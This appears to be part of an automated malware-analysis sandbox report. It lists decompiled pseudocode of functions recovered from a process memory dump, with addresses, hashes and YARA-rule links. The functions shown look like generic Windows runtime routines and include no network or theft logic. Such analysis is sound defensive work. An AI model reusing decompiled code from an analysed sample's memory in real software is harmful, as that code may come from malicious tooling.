					if( *0x31b848c == 0) {
						E030EFA00(0x31b8610, _t19, _t27, 0x31b8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E030F2581(0x31b8610, 0x30a50a0, _t26, _t27, _t28);
						E030EFA00(0x31b8610, 0x30a50a0, _t27, 0x31b8610);
					}
				} else {
					L1:
					_t11 =  *0x31b8614; // 0x0
					if(_t11 == 0) {
						_t11 = E03104886(0x30a1088, 1, 0x31b8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E030F2581(0x31b8610, (_t11 << 4) + 0x30a5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                                                                                    0x030f23b0
                                                                                                                                                    0x030f23b6
                                                                                                                                                    0x030f2409
                                                                                                                                                    0x030f2415
                                                                                                                                                    0x03135ae9
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f241b
                                                                                                                                                    0x030f241b
                                                                                                                                                    0x030f241d
                                                                                                                                                    0x030f2427
                                                                                                                                                    0x030f242e
                                                                                                                                                    0x030f2430
                                                                                                                                                    0x030f2430
                                                                                                                                                    0x030f23b8
                                                                                                                                                    0x030f23b8
                                                                                                                                                    0x030f23b8
                                                                                                                                                    0x030f23bf
                                                                                                                                                    0x030f23fc
                                                                                                                                                    0x030f23fc
                                                                                                                                                    0x030f23c1
                                                                                                                                                    0x030f23c3
                                                                                                                                                    0x030f23d0
                                                                                                                                                    0x030f23d8
                                                                                                                                                    0x030f23d8
                                                                                                                                                    0x030f23dc
                                                                                                                                                    0x030f23de
                                                                                                                                                    0x030f23e1
                                                                                                                                                    0x030f23e1
                                                                                                                                                    0x030f23ec

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b52c0ee216f647426ec6a70750239f181e804f5e64d5e847385cd78a3649bd4c
                                                                                                                                                    • Instruction ID: 33235e620dffc89add3586a7a2dc184ceb0ab3a18ca5adff0341156ca915e619
                                                                                                                                                    • Opcode Fuzzy Hash: b52c0ee216f647426ec6a70750239f181e804f5e64d5e847385cd78a3649bd4c
                                                                                                                                                    • Instruction Fuzzy Hash: 951108B57027446FD624E62AAC80F5AB2DDABD4A10F194816E702AF580DBB0E840D658
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031446A7, Relevance: .1, Instructions: 59COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E031446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L030E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E0310F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E030FD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L030E77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                                                                                    0x031446b7
                                                                                                                                                    0x031446ba
                                                                                                                                                    0x031446c5
                                                                                                                                                    0x031446c8
                                                                                                                                                    0x031446d0
                                                                                                                                                    0x031446d4
                                                                                                                                                    0x031446e6
                                                                                                                                                    0x031446e9
                                                                                                                                                    0x031446f4
                                                                                                                                                    0x031446ff
                                                                                                                                                    0x03144705
                                                                                                                                                    0x03144706
                                                                                                                                                    0x0314470c
                                                                                                                                                    0x03144713
                                                                                                                                                    0x0314471b
                                                                                                                                                    0x03144723
                                                                                                                                                    0x03144725
                                                                                                                                                    0x031446d6
                                                                                                                                                    0x031446d9
                                                                                                                                                    0x031446db
                                                                                                                                                    0x031446db
                                                                                                                                                    0x03144732

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                                    • Instruction ID: 0da90e95a4b1b59fa9627716ff55bb19777f2c0b48b420500193e00683c28a81
                                                                                                                                                    • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                                    • Instruction Fuzzy Hash: 70112576604208BFCB15DF6DD8809BEB7B9EF99310F1080AAF984CB350DA318D51D3A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CC962, Relevance: .1, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 42%
                                                                                                                                                    			E030CC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t19;
				char _t22;
				intOrPtr _t26;
				intOrPtr _t27;
				char _t32;
				char _t34;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x31bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E030DEEF0(0x31b70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0314F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E030DEB70(_t29, 0x31b70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0310B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0314F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x31b70c0; // 0x0
					while(_t38 != 0x31b70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x31bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                                                                    0x030cc96a
                                                                                                                                                    0x030cc974
                                                                                                                                                    0x030cc988
                                                                                                                                                    0x030cc98a
                                                                                                                                                    0x03137c9d
                                                                                                                                                    0x03137c9f
                                                                                                                                                    0x03137ca4
                                                                                                                                                    0x03137cae
                                                                                                                                                    0x03137cf0
                                                                                                                                                    0x03137cf5
                                                                                                                                                    0x03137cfa
                                                                                                                                                    0x030cc992
                                                                                                                                                    0x030cc996
                                                                                                                                                    0x030cc997
                                                                                                                                                    0x030cc998
                                                                                                                                                    0x030cc9a3
                                                                                                                                                    0x030cc9a3
                                                                                                                                                    0x03137cb0
                                                                                                                                                    0x03137cb7
                                                                                                                                                    0x03137cbb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137cbd
                                                                                                                                                    0x03137ce8
                                                                                                                                                    0x03137cc5
                                                                                                                                                    0x03137cc8
                                                                                                                                                    0x03137cca
                                                                                                                                                    0x03137cd0
                                                                                                                                                    0x03137cd6
                                                                                                                                                    0x03137cde
                                                                                                                                                    0x03137ce4
                                                                                                                                                    0x03137ce4
                                                                                                                                                    0x03137cd0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03137ce8
                                                                                                                                                    0x030cc990
                                                                                                                                                    0x00000000

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a53f97d81c8774ab32987e4ad4b4acb225ac9447f4fb98de924787c81fe40e07
                                                                                                                                                    • Instruction ID: b94c5935df39becf3be2d5a7035dd903a9611ed36a478d45c972291b4743d4b6
                                                                                                                                                    • Opcode Fuzzy Hash: a53f97d81c8774ab32987e4ad4b4acb225ac9447f4fb98de924787c81fe40e07
                                                                                                                                                    • Instruction Fuzzy Hash: EC11CE713007469BCB14EF28D885A6BB7E5FFCE610B040529E8458B691EB20EC55C7E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 031037F5, Relevance: .1, Instructions: 57COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 87%
                                                                                                                                                    			E031037F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E030E2280(_t6, 0x31b8550);
				}
				_t29 = E0310387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E030DFFB0(0x31b8550, _t27, 0x31b8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L030E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                                                                                    0x031037fa
                                                                                                                                                    0x031037fc
                                                                                                                                                    0x03103805
                                                                                                                                                    0x03103808
                                                                                                                                                    0x03103808
                                                                                                                                                    0x03103814
                                                                                                                                                    0x03103818
                                                                                                                                                    0x03103846
                                                                                                                                                    0x03103848
                                                                                                                                                    0x0310384b
                                                                                                                                                    0x0310384b
                                                                                                                                                    0x03103852
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103854
                                                                                                                                                    0x03103856
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103863
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103863
                                                                                                                                                    0x0310381a
                                                                                                                                                    0x0310381a
                                                                                                                                                    0x0310381f
                                                                                                                                                    0x0310386e
                                                                                                                                                    0x0310386e
                                                                                                                                                    0x03103871
                                                                                                                                                    0x03103873
                                                                                                                                                    0x03103873
                                                                                                                                                    0x03103868
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103868
                                                                                                                                                    0x03103821
                                                                                                                                                    0x03103826
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103828
                                                                                                                                                    0x0310382a
                                                                                                                                                    0x03103841
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03103841

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f0a02d313fe4c9e1489ecadd7411cfecb8c0e7f37f2a7c7491191797460705ad
                                                                                                                                                    • Instruction ID: d69d327ce557ec620ec13d7523ed05b646e7a5c64fe976e166d0c442b1682cb1
                                                                                                                                                    • Opcode Fuzzy Hash: f0a02d313fe4c9e1489ecadd7411cfecb8c0e7f37f2a7c7491191797460705ad
                                                                                                                                                    • Instruction Fuzzy Hash: FB01DB7AA016105BC33BDB19D580E26BBAADFCDB5071949EFE4558F294D770C801C790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F002D, Relevance: .1, Instructions: 55COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E030F002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E030E7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E030E7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E030E7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E030E7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                                                                                    0x030f0032
                                                                                                                                                    0x030f0037
                                                                                                                                                    0x030f0043
                                                                                                                                                    0x03134b3a
                                                                                                                                                    0x030f0049
                                                                                                                                                    0x030f0049
                                                                                                                                                    0x030f0049
                                                                                                                                                    0x030f004e
                                                                                                                                                    0x030f0053
                                                                                                                                                    0x03134b48
                                                                                                                                                    0x03134b5a
                                                                                                                                                    0x03134b4a
                                                                                                                                                    0x03134b53
                                                                                                                                                    0x03134b53
                                                                                                                                                    0x03134b5f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134b61
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134b61
                                                                                                                                                    0x030f0059
                                                                                                                                                    0x030f0059
                                                                                                                                                    0x030f0060
                                                                                                                                                    0x03134b6f
                                                                                                                                                    0x03134b6f
                                                                                                                                                    0x030f0069
                                                                                                                                                    0x03134b83
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134b90
                                                                                                                                                    0x03134b9b
                                                                                                                                                    0x03134b9b
                                                                                                                                                    0x03134ba4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03134baa
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f006f
                                                                                                                                                    0x030f006f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030f006f
                                                                                                                                                    0x030f0069

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                                                    • Instruction ID: 1d3db2c9803c37d9b3130c83bf15413343640edb76c0d6ecbadef40453b87582
                                                                                                                                                    • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                                                    • Instruction Fuzzy Hash: AA11A136706685CFD722D76AD944B7577E8EF46B54F0D00E0DE048BAA2DB39D841C660
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030D766D, Relevance: .1, Instructions: 54COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E030D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E030FF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E030FF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L030E4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                                                                                                                    0x030d7672
                                                                                                                                                    0x030d767f
                                                                                                                                                    0x030d7689
                                                                                                                                                    0x030d76de
                                                                                                                                                    0x030d76de
                                                                                                                                                    0x030d768b
                                                                                                                                                    0x030d7691
                                                                                                                                                    0x030d7693
                                                                                                                                                    0x030d7697
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d7699
                                                                                                                                                    0x030d76a8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d76aa
                                                                                                                                                    0x030d76ad
                                                                                                                                                    0x030d76b1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d76b3
                                                                                                                                                    0x030d76b3
                                                                                                                                                    0x030d76b5
                                                                                                                                                    0x030d76ba
                                                                                                                                                    0x030d76bc
                                                                                                                                                    0x030d76bc
                                                                                                                                                    0x030d76c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030d76c2
                                                                                                                                                    0x030d76ce
                                                                                                                                                    0x030d76ce
                                                                                                                                                    0x030d76c0
                                                                                                                                                    0x030d76b1
                                                                                                                                                    0x030d76a8
                                                                                                                                                    0x030d7697
                                                                                                                                                    0x030d76d9

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                                                    • Instruction ID: 50539a6ea11ebbf911ab09df53cf23b16401d1181939a10d9d8807d0af1c34e8
                                                                                                                                                    • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                                                                                    • Instruction Fuzzy Hash: 18018432702319AFC730DE5ECC41E9BB7EDEB84E60B280528B908CF250EA30DD0187A4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030C9080, Relevance: .1, Instructions: 53COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 69%
                                                                                                                                                    			E030C9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x31b85ec;
				E030E2280(_t48, 0x31b85ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E030DFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x31b538c; // 0x77f06848
					if( *_t84 != 0x31b5388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x319f6e8);
						E0311D0E8(0x31b85ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E031988F5(_t80, _t85, 0x31b5388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x31b86c0; // 0x8407b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x31b86b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E030E2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E031988F5(0x31b85ec, _t85, 0x31b5388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0310AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x31bb1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x31b84c0;
																			if(_t82 >=  *0x31b84c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03199063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E030C922A(_t99);
										_t64 = E030E7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03198B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x31b86c0; // 0x8407b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x31b86b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x31b86bc;
													_t87 = 0x31b86b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E030C9240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x31b86c4;
												_t87 = 0x31b86c0;
												L27:
												E030F9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E0311D130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x31b5388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x31b538c = _t51;
						goto L6;
					}
				}
			}




















                                                                                                                                                    0x030c9082
                                                                                                                                                    0x030c9083
                                                                                                                                                    0x030c9084
                                                                                                                                                    0x030c9085
                                                                                                                                                    0x030c9087
                                                                                                                                                    0x030c9096
                                                                                                                                                    0x030c9098
                                                                                                                                                    0x030c9098
                                                                                                                                                    0x030c909e
                                                                                                                                                    0x030c90a8
                                                                                                                                                    0x030c90e7
                                                                                                                                                    0x030c90e7
                                                                                                                                                    0x030c90aa
                                                                                                                                                    0x030c90b0
                                                                                                                                                    0x030c90b7
                                                                                                                                                    0x030c90bd
                                                                                                                                                    0x030c90dd
                                                                                                                                                    0x030c90e6
                                                                                                                                                    0x030c90bf
                                                                                                                                                    0x030c90bf
                                                                                                                                                    0x030c90c7
                                                                                                                                                    0x030c90cf
                                                                                                                                                    0x030c90f1
                                                                                                                                                    0x030c90f2
                                                                                                                                                    0x030c90f4
                                                                                                                                                    0x030c90f5
                                                                                                                                                    0x030c90f6
                                                                                                                                                    0x030c90f7
                                                                                                                                                    0x030c90f8
                                                                                                                                                    0x030c90f9
                                                                                                                                                    0x030c90fa
                                                                                                                                                    0x030c90fb
                                                                                                                                                    0x030c90fc
                                                                                                                                                    0x030c90fd
                                                                                                                                                    0x030c90fe
                                                                                                                                                    0x030c90ff
                                                                                                                                                    0x030c9100
                                                                                                                                                    0x030c9102
                                                                                                                                                    0x030c9107
                                                                                                                                                    0x030c910c
                                                                                                                                                    0x030c9110
                                                                                                                                                    0x030c9113
                                                                                                                                                    0x030c9115
                                                                                                                                                    0x030c9136
                                                                                                                                                    0x030c913f
                                                                                                                                                    0x030c9143
                                                                                                                                                    0x031237e4
                                                                                                                                                    0x031237e4
                                                                                                                                                    0x030c9117
                                                                                                                                                    0x030c9117
                                                                                                                                                    0x030c911d
